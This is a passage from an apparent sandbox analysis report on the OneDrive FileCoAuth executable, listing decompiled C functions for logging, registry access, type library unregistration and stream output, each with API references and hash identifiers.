    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp,0000007B,RunningObjectTableHelper::CreateMoniker,00EA7D10,4664AD81,00000001,00000001,00000001,00000001,00000000,00000001,00000000,00000000,?,RunningObjectTableHelper::CreateMoniker,00000054), ref: 00E956B1
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM(?,RunningObjectTableHelper::CreateMoniker,00000054,00E95540,?,00000000,?,?,?,?,RunningObjectTableHelper::GetObjectW), ref: 00E956B7
    Strings
    • RunningObjectTableHelper::CreateMoniker, xrefs: 00E95616, 00E956A5
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp, xrefs: 00E956AC
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_LoggingStructured$??3@EventEvent@@H_prolog3Needed@@Parameter@@@RotateWrite
    • String ID: RunningObjectTableHelper::CreateMoniker$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\runningobjecttablehelper.cpp
    • API String ID: 448590175-2618668510
    • Opcode ID: 40bfafd37cb1d99bbf9cf1cbe4ab4a8b70cb279b325cdc3d7907199709c0faff
    • Instruction ID: fdf30cd6d21b74dfd208214fb0980d7a2720430ddefb31e8df8aeb04724797a5
    • Opcode Fuzzy Hash: 40bfafd37cb1d99bbf9cf1cbe4ab4a8b70cb279b325cdc3d7907199709c0faff
    • Instruction Fuzzy Hash: 2331BF71A01308AFDF04DBA4CC95AEEBBB5EF4D710F545418F801BB281DB706A46CB50
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 71%
    			E00E9AEAD(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, char _a8, intOrPtr* _a12, char _a16, intOrPtr* _a20, intOrPtr* _a32) {
    				signed int _v4;
    				intOrPtr _t60;
    				intOrPtr* _t62;
    				intOrPtr _t63;
    				intOrPtr* _t64;
    				intOrPtr* _t82;
    				void* _t86;
    				void* _t90;
    				intOrPtr* _t91;
    				intOrPtr* _t93;
    				intOrPtr _t94;
    				intOrPtr _t95;
    				intOrPtr _t96;
    				intOrPtr* _t101;
    				intOrPtr* _t105;
    				void* _t106;
    				intOrPtr* _t107;
    				char _t110;
    				intOrPtr* _t111;
    				intOrPtr* _t113;
    				char** _t117;
    
    				_t106 = __edi;
    				_t90 = __ebx;
    				_push(0);
    				_t59 = E00EA3161(E00EA3F58, __ebx, __edi, __esi);
    				_t110 = _a8;
    				_v4 = _v4 & 0x00000000;
    				while(_t110 != _a12) {
    					_t93 = _a32;
    					if(_t93 == 0) {
    						__imp__?_Xbad_function_call@std@@YAXXZ();
    						asm("int3");
    						_push(_t90);
    						_t91 = _t93;
    						_push(_t110);
    						_push(_t106);
    						_t60 =  *((intOrPtr*)(_t91 + 4));
    						if(_t60 >= 0x3fffffe) {
    							_t113 = _a20;
    							_t60 = E00E94F21(_t113 + 0x10);
    							L00EA29EC();
    							 *_t117 = "map/set<T> too long";
    							__imp__?_Xlength_error@std@@YAXPBD@Z(_t113);
    						}
    						_t107 = _a20;
    						 *((intOrPtr*)(_t91 + 4)) = _t60 + 1;
    						_t62 = _a12;
    						 *((intOrPtr*)(_t107 + 4)) = _t62;
    						_t94 =  *_t91;
    						if(_t62 != _t94) {
    							if(_a8 == 0) {
    								 *((intOrPtr*)(_t62 + 8)) = _t107;
    								_t95 =  *_t91;
    								if(_t62 ==  *((intOrPtr*)(_t95 + 8))) {
    									 *((intOrPtr*)(_t95 + 8)) = _t107;
    								}
    							} else {
    								 *_t62 = _t107;
    								_t101 =  *_t91;
    								if(_t62 ==  *_t101) {
    									 *_t101 = _t107;
    								}
    							}
    						} else {
    							 *((intOrPtr*)(_t94 + 4)) = _t107;
    							 *((intOrPtr*)( *_t91)) = _t107;
    							 *((intOrPtr*)( *_t91 + 8)) = _t107;
    						}
    						_t63 =  *((intOrPtr*)(_t107 + 4));
    						_t111 = _t107;
    						while( *((char*)(_t63 + 0xc)) == 0) {
    							_t64 =  *((intOrPtr*)(_t111 + 4));
    							_t105 =  *((intOrPtr*)(_t64 + 4));
    							_t96 =  *_t105;
    							if(_t64 != _t96) {
    								if( *((char*)(_t96 + 0xc)) != 0) {
    									if(_t111 ==  *_t64) {
    										_t111 = _t64;
    										E00E95088(_t91, _t111);
    									}
    									 *((char*)( *((intOrPtr*)(_t111 + 4)) + 0xc)) = 1;
    									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
    									E00E95042(_t91,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)));
    								} else {
    									goto L23;
    								}
    							} else {
    								_t96 =  *((intOrPtr*)(_t105 + 8));
    								if( *((char*)(_t96 + 0xc)) == 0) {
    									L23:
    									 *((char*)(_t64 + 0xc)) = 1;
    									 *((char*)(_t96 + 0xc)) = 1;
    									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
    									_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4));
    								} else {
    									if(_t111 ==  *((intOrPtr*)(_t64 + 8))) {
    										_t111 = _t64;
    										E00E95042(_t91, _t111);
    									}
    									 *((char*)( *((intOrPtr*)(_t111 + 4)) + 0xc)) = 1;
    									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
    									E00E95088(_t91,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)));
    								}
    							}
    							_t63 =  *((intOrPtr*)(_t111 + 4));
    						}
    						 *((char*)( *((intOrPtr*)( *_t91 + 4)) + 0xc)) = 1;
    						_t82 = _a4;
    						 *_t82 = _t107;
    						return _t82;
    					} else {
    						_push(_t110);
    						if( *((intOrPtr*)( *_t93 + 8))() != 0) {
    							break;
    						} else {
    							_t110 = _t110 + 0x11c;
    							continue;
    						}
    					}
    					L30:
    				}
    				_v4 = 1;
    				_t86 = E00E9E9D6(_t59,  &_a16);
    				_v4 = _v4 | 0xffffffff;
    				E00E9E9D6(_t86,  &_a16);
    				return E00EA313E(_t110);
    				goto L30;
    			}

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9AEB4
    • ?_Xbad_function_call@std@@YAXXZ.MSVCP120(00000000), ref: 00E9AF03
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9AF2A
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(?), ref: 00E9AF36
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@H_prolog3Xbad_function_call@std@@Xlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2767681651-1285458680
    • Opcode ID: 19ba885601648ef467154a78cf1f99931e57e562f1d891fa1644687f4afe8828
    • Instruction ID: ca81d2c8d79e3d5e0cd66ced0cb073205cc661c4f53c822e2fb25329d97022c3
    • Opcode Fuzzy Hash: 19ba885601648ef467154a78cf1f99931e57e562f1d891fa1644687f4afe8828
    • Instruction Fuzzy Hash: 3521B071601204DFCF00DF18C484A99BBE0FF56324F1990A9F819AB3A2C770ED45CB91
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 72%
    			E00E928A9(void* __ebx, struct HINSTANCE__* __ecx, signed int __edx, void* __eflags) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				void* __esi;
    				signed int _t23;
    				void* _t27;
    				signed int _t28;
    				intOrPtr* _t32;
    				void* _t33;
    				void* _t36;
    				intOrPtr* _t37;
    				struct HINSTANCE__* _t39;
    				void* _t41;
    				intOrPtr _t47;
    				void* _t50;
    				signed int _t52;
    
    				_t49 = __edx;
    				_t41 = __ebx;
    				_t23 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t23 ^ _t52;
    				_v16 = _v16 & 0x00000000;
    				_v12 = _v12 & 0x00000000;
    				_t27 = E00E923DD(__ecx, __edx, _t50,  &_v16,  &_v12);
    				_t51 = _t27;
    				if(_t27 >= 0) {
    					_t32 = _v12;
    					_t49 =  &_v20;
    					_t33 =  *((intOrPtr*)( *_t32 + 0x1c))(_t32,  &_v20);
    					_t51 = _t33;
    					if(_t33 >= 0) {
    						if( *0xeb2330 != 1) {
    							L5:
    							_t49 = __imp__#186;
    						} else {
    							_t39 = GetModuleHandleW(L"OLEAUT32.DLL");
    							if(_t39 == 0) {
    								goto L5;
    							} else {
    								_t49 = GetProcAddress(_t39, "UnRegisterTypeLibForUser");
    								if(_t49 == 0) {
    									goto L5;
    								}
    							}
    						}
    						_t47 = _v20;
    						_t36 =  *_t49(_t47,  *(_t47 + 0x18) & 0x0000ffff,  *(_t47 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t47 + 0x10)),  *((intOrPtr*)(_t47 + 0x14)));
    						_t51 = _t36;
    						_t37 = _v12;
    						 *((intOrPtr*)( *_t37 + 0x30))(_t37, _v20);
    					}
    				}
    				_t28 = _v12;
    				if(_t28 != 0) {
    					 *((intOrPtr*)( *_t28 + 8))(_t28);
    				}
    				__imp__#6();
    				return E00EA29F2(_t41, _v8 ^ _t52, _t49, _t50, _t51, _v16);
    			}

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E928F8
    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E92908
    • #6.OLEAUT32(00000000,00000000,?,?), ref: 00E9294E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressFileHandleNameProc
    • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
    • API String ID: 3556842501-2196524522
    • Opcode ID: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction ID: 11b62fa77aba3ce167d4146fba5cd72f5b65f11fe7bad45bab32e633f4578d32
    • Opcode Fuzzy Hash: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction Fuzzy Hash: 40219D71A00219AFCF14DFA5CC44AAE7BB8AF89304F14419CE941FB251DB35ED4ADB60
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,0000005A,StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount,00EA7810,DFB9F0D4,00000001,00000003,00000001), ref: 00E9446C
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E94472
    Strings
    • x, xrefs: 00E94458
    • StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount, xrefs: 00E9444C
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E94453
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: x$StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-2045625249
    • Opcode ID: 26d72c3fac011974336052989bec98e061df498194f03f9761570afa8e321def
    • Instruction ID: 01cd56cdc203bb96d061d6793c0d3a0db0e9fa7fdeba063cecdffd76ddd2e718
    • Opcode Fuzzy Hash: 26d72c3fac011974336052989bec98e061df498194f03f9761570afa8e321def
    • Instruction Fuzzy Hash: 271191B0E04308AFCB18CF59EC46AAEBBB0EB4D701F10552EE956BB280D7B16901CF44
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 36%
    			E00E992D2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t26;
    				signed int _t29;
    				void* _t35;
    				void* _t36;
    				intOrPtr* _t38;
    				void* _t39;
    
    				_push(0x2c);
    				E00EA3194(E00EA3C6E, __ebx, __edi, __esi);
    				_t38 = __ecx;
    				_t26 = 0;
    				 *((intOrPtr*)(_t39 - 0x38)) = 0;
    				E00E9851B(_t39 - 0x38, "Utilities::IsSystemRtl");
    				_t29 = 7;
    				 *((intOrPtr*)(_t39 - 4)) = 0;
    				_t35 = _t39 - 0x32;
    				 *((short*)(_t39 - 0x34)) = 0;
    				memset(_t35, 0, _t29 << 2);
    				_t36 = _t35 + _t29;
    				_push(0x10);
    				_push(_t39 - 0x34);
    				asm("stosw");
    				_push(0x58);
    				_push(0x400);
    				if( *((intOrPtr*)( *_t38 + 0x1dc))() != 0) {
    					_t26 = 0 | ( *(_t39 - 0x26) & 0x00000800) > 0x00000000;
    				} else {
    					__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\utilities.cpp", 0x7a9, "Utilities::IsSystemRtl", 0xea7d10, 0x772385b, 1, 0, 0);
    					__imp__?LoggingRotateIfNeeded@@YGXXZ();
    				}
    				E00E98588();
    				return E00EA3152(_t26, _t36, _t38);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E992D9
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp,000007A9,Utilities::IsSystemRtl,00EA7D10,0772385B,00000001,00000000,00000000), ref: 00E9933D
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99343
    Strings
    • Utilities::IsSystemRtl, xrefs: 00E992E5, 00E9932E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp, xrefs: 00E99338
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@H_prolog3_Needed@@Parameter@@@RotateWrite
    • String ID: Utilities::IsSystemRtl$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp
    • API String ID: 1253850681-2586932742
    • Opcode ID: e8f4486e9465db796047022751caebff3c5ed213fa1c041f45719502cf355d75
    • Instruction ID: 37231d5004eed008b1ec39f9d8ea4d3ba083cc789a594ea46add01eb508f672a
    • Opcode Fuzzy Hash: e8f4486e9465db796047022751caebff3c5ed213fa1c041f45719502cf355d75
    • Instruction Fuzzy Hash: 4601BC30A84304BEEB04EFA8DD86FDD77B1AF1EB00F402829B2057E1D1CEB469088B11
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 68%
    			E00E91F10(intOrPtr* __ecx, void* _a4, short* _a8, int _a16, void** _a20) {
    				struct HINSTANCE__* _t13;
    				_Unknown_base(*)()* _t14;
    				intOrPtr* _t18;
    
    				_t18 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) == 0) {
    						L6:
    						return 1;
    					}
    					return RegOpenKeyExW(_a4, _a8, 0, _a16, _a20);
    				}
    				_t13 = GetModuleHandleW(L"Advapi32.dll");
    				if(_t13 == 0) {
    					goto L6;
    				}
    				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedW");
    				if(_t14 == 0) {
    					goto L6;
    				}
    				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
    			}

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F24
    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00E91F34
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E91F64
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleOpenProc
    • String ID: Advapi32.dll$RegOpenKeyTransactedW
    • API String ID: 1337834000-3913318428
    • Opcode ID: 7ed2d7c6f6c4c21312275b4c03c4abf5cfb9b96c6931155562c8b6d080aef4c6
    • Instruction ID: a34a38fe88e7a99c3540645b6122fd71c79c99e6a352e76bffb6addde7b10fbb
    • Opcode Fuzzy Hash: 7ed2d7c6f6c4c21312275b4c03c4abf5cfb9b96c6931155562c8b6d080aef4c6
    • Instruction Fuzzy Hash: ABF04F3220420EBFDF211F92DC04D9B3F7AEF8ABD17049069F956B5020C7329861EB60
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 36%
    			E00E97EF0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int _t61;
    				intOrPtr _t62;
    				signed int _t64;
    				intOrPtr _t65;
    				intOrPtr _t67;
    				intOrPtr _t71;
    				signed int _t76;
    				signed short _t78;
    				signed int _t81;
    				signed short _t83;
    				signed int _t87;
    				intOrPtr _t90;
    				signed int _t91;
    				signed int _t98;
    				signed int _t102;
    				signed int _t106;
    				intOrPtr* _t108;
    				void* _t111;
    				signed int _t113;
    				signed int _t115;
    
    				_push(0x24);
    				E00EA31CA(E00EA3AE8, __ebx, __edi, __esi);
    				_t87 = 0;
    				 *(_t111 - 0x28) = 0;
    				_t61 = E00E94E74( *((intOrPtr*)(_t111 + 0xc)));
    				_t108 =  *((intOrPtr*)(_t111 + 8));
    				_t106 = _t61;
    				 *(_t111 - 0x24) = _t106;
    				_t90 =  *((intOrPtr*)( *_t108 + 4));
    				_t62 =  *((intOrPtr*)(_t90 + _t108 + 0x20));
    				_t91 =  *(_t90 + _t108 + 0x24);
    				_t113 = _t91;
    				if(_t113 < 0) {
    					L7:
    					asm("xorps xmm0, xmm0");
    					asm("movlpd [ebp-0x1c], xmm0");
    					 *(_t111 - 0x20) =  *(_t111 - 0x18);
    					_t64 =  *(_t111 - 0x1c);
    				} else {
    					if(_t113 > 0) {
    						L6:
    						_t64 = _t62 - _t106;
    						asm("sbb ecx, esi");
    						 *(_t111 - 0x20) = _t91;
    					} else {
    						if(_t62 <= 0) {
    							goto L7;
    						} else {
    							_t115 = _t91;
    							if(_t115 < 0) {
    								goto L7;
    							} else {
    								if(_t115 > 0) {
    									goto L6;
    								} else {
    									_t116 = _t62 - _t106;
    									if(_t62 <= _t106) {
    										goto L7;
    									} else {
    										goto L6;
    									}
    								}
    							}
    						}
    					}
    				}
    				_push(_t108);
    				 *(_t111 - 0x18) = _t64;
    				_t65 = E00E97E66(_t87, _t111 - 0x30, _t108, 0, _t116);
    				 *((intOrPtr*)(_t111 - 4)) = 0;
    				if( *((char*)(_t111 - 0x2c)) != 0) {
    					 *((char*)(_t111 - 4)) = 1;
    					_t67 =  *((intOrPtr*)( *_t108 + 4));
    					__eflags = ( *(_t67 + _t108 + 0x14) & 0x000001c0) - 0x40;
    					if(( *(_t67 + _t108 + 0x14) & 0x000001c0) == 0x40) {
    						L18:
    						_t71 =  *((intOrPtr*)( *_t108 + 4));
    						__imp__?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z( *((intOrPtr*)(_t111 + 0xc)),  *(_t111 - 0x24), 0);
    						__eflags = _t71 -  *(_t111 - 0x24);
    						if(_t71 !=  *(_t111 - 0x24)) {
    							L28:
    							_t87 = 4;
    						} else {
    							__eflags = _t106;
    							if(_t106 != 0) {
    								goto L28;
    							} else {
    								_t76 =  *(_t111 - 0x18);
    								_t98 =  *(_t111 - 0x20);
    								while(1) {
    									__eflags = _t98;
    									if(__eflags < 0) {
    										goto L29;
    									}
    									if(__eflags > 0) {
    										L24:
    										_t78 =  *( *((intOrPtr*)( *_t108 + 4)) + _t108 + 0x40) & 0x0000ffff;
    										__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t78);
    										__eflags = 0xffff - (_t78 & 0x0000ffff);
    										if(0xffff != (_t78 & 0x0000ffff)) {
    											_t98 =  *(_t111 - 0x20);
    											_t76 =  *(_t111 - 0x18) + 0xffffffff;
    											 *(_t111 - 0x18) = _t76;
    											asm("adc ecx, 0xffffffff");
    											 *(_t111 - 0x20) = _t98;
    											continue;
    										} else {
    											_t87 = _t87 | 0x00000004;
    										}
    									} else {
    										__eflags = _t76;
    										if(_t76 > 0) {
    											goto L24;
    										}
    									}
    									goto L29;
    								}
    							}
    						}
    					} else {
    						_t81 =  *(_t111 - 0x18);
    						_t102 =  *(_t111 - 0x20);
    						while(1) {
    							__eflags = _t102;
    							if(__eflags < 0) {
    								break;
    							}
    							if(__eflags > 0) {
    								L15:
    								_t83 =  *( *((intOrPtr*)( *_t108 + 4)) + _t108 + 0x40) & 0x0000ffff;
    								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t83);
    								__eflags = 0xffff - (_t83 & 0x0000ffff);
    								if(0xffff != (_t83 & 0x0000ffff)) {
    									_t102 =  *(_t111 - 0x20);
    									_t81 =  *(_t111 - 0x18) + 0xffffffff;
    									 *(_t111 - 0x18) = _t81;
    									asm("adc ecx, 0xffffffff");
    									 *(_t111 - 0x20) = _t102;
    									continue;
    								} else {
    									_t87 = _t87 | 0x00000004;
    									__eflags = _t87;
    									 *(_t111 - 0x28) = _t87;
    								}
    							} else {
    								__eflags = _t81;
    								if(_t81 > 0) {
    									goto L15;
    								}
    							}
    							break;
    						}
    						__eflags = _t87;
    						if(_t87 == 0) {
    							goto L18;
    						}
    					}
    					L29:
    					_t65 =  *((intOrPtr*)( *_t108 + 4));
    					 *((intOrPtr*)(_t65 + _t108 + 0x20)) = 0;
    					 *((intOrPtr*)(_t65 + _t108 + 0x24)) = 0;
    					 *((intOrPtr*)(_t111 - 4)) = 0;
    				} else {
    					_t87 = 4;
    				}
    				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t87, 0);
    				E00E97ED1(_t65, _t111 - 0x30);
    				return E00EA313E(_t108);
    			}

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E97EF7
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
    • ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?setstate@?$basic_ios@_?sputn@?$basic_streambuf@_H_prolog3_catch
    • String ID:
    • API String ID: 1687759287-0
    • Opcode ID: d503dfbe023836dc4c05f5a6cb5aff9c7ee3a770bf5e7bbb11a04ee6c8a083f2
    • Instruction ID: f40d8210c905ba99f79e74e3d444c15f633b7de09d60474bafd075927bb709fc
    • Opcode Fuzzy Hash: d503dfbe023836dc4c05f5a6cb5aff9c7ee3a770bf5e7bbb11a04ee6c8a083f2
    • Instruction Fuzzy Hash: BF51BD30A151168FDF24DFA8C9808ACBBB1FF09718B246119F956BB791D735EC44CB90
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 34%
    			E00E99F8B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr _t60;
    				intOrPtr _t62;
    				intOrPtr _t66;
    				signed int _t71;
    				signed short _t73;
    				signed int _t76;
    				signed short _t78;
    				signed int _t82;
    				intOrPtr _t83;
    				intOrPtr* _t85;
    				signed int _t98;
    				intOrPtr* _t102;
    				void* _t103;
    				intOrPtr _t105;
    
    				_push(0x1c);
    				E00EA31CA(E00EA3D83, __ebx, __edi, __esi);
    				_t102 =  *((intOrPtr*)(_t103 + 8));
    				_t82 = 0;
    				 *(_t103 - 0x1c) = 0;
    				_t98 =  *( *((intOrPtr*)(_t103 + 0xc)) + 0x10);
    				 *(_t103 - 0x18) = _t98;
    				_t58 =  *((intOrPtr*)( *_t102 + 4));
    				_t83 =  *((intOrPtr*)(_t58 + _t102 + 0x20));
    				_t59 =  *((intOrPtr*)(_t58 + _t102 + 0x24));
    				_t105 = _t59;
    				if(_t105 < 0 || _t105 <= 0 && _t83 <= 0) {
    					L5:
    					 *(_t103 - 0x14) = 0;
    				} else {
    					 *((intOrPtr*)(_t103 - 0x24)) = _t59;
    					_t107 = _t83 - _t98;
    					if(_t83 <= _t98) {
    						goto L5;
    					} else {
    						 *((intOrPtr*)(_t103 - 0x24)) = _t59;
    						 *(_t103 - 0x14) = _t83 - _t98;
    					}
    				}
    				_push(_t102);
    				_t60 = E00E97E66(_t82, _t103 - 0x28, 0, _t102, _t107);
    				 *((intOrPtr*)(_t103 - 4)) = 0;
    				if( *((char*)(_t103 - 0x24)) != 0) {
    					 *((char*)(_t103 - 4)) = 1;
    					_t62 =  *((intOrPtr*)( *_t102 + 4));
    					__eflags = ( *(_t62 + _t102 + 0x14) & 0x000001c0) - 0x40;
    					if(( *(_t62 + _t102 + 0x14) & 0x000001c0) == 0x40) {
    						L14:
    						_t85 =  *((intOrPtr*)(_t103 + 0xc));
    						__eflags =  *((intOrPtr*)(_t85 + 0x14)) - 8;
    						if( *((intOrPtr*)(_t85 + 0x14)) >= 8) {
    							_t85 =  *_t85;
    						}
    						_t66 =  *((intOrPtr*)( *_t102 + 4));
    						__imp__?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z(_t85,  *(_t103 - 0x18), 0);
    						__eflags = _t66 -  *(_t103 - 0x18);
    						if(_t66 !=  *(_t103 - 0x18)) {
    							L24:
    							_t82 = 4;
    						} else {
    							__eflags = _t98;
    							if(_t98 != 0) {
    								goto L24;
    							} else {
